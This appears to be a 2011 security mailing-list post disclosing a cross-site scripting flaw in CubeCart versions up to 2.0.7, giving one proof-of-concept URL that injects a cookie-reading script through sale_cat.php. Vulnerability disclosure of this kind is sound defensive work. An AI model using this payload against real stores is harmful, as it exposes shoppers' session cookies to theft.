XSS in CubeCart <= 2.0.7

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Subject: XSS in CubeCart <= 2.0.7
From: Michele Spagnuolo <mikispag@xxxxxxxxx>
Date: Sun, 6 Mar 2011 21:41:22 +0100

CubeCart (http://www.cubecart.com) up to version 2.0.7 inclusive are vulnerable to a XSS in sale_cat.php.

http://www.example.com/storedirectory/sale_cat.php/";;<script>alert(document.cookie)</script>

Prev by Date: 'Quick Polls' Local File Inclusion & Deletion Vulnerabilities (CVE-2011-1099)
Next by Date: [DCA-2011-0009] Weborf 0.12.4 Denial-of-Service
Previous by thread: 'Quick Polls' Local File Inclusion & Deletion Vulnerabilities (CVE-2011-1099)
Next by thread: [DCA-2011-0009] Weborf 0.12.4 Denial-of-Service
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux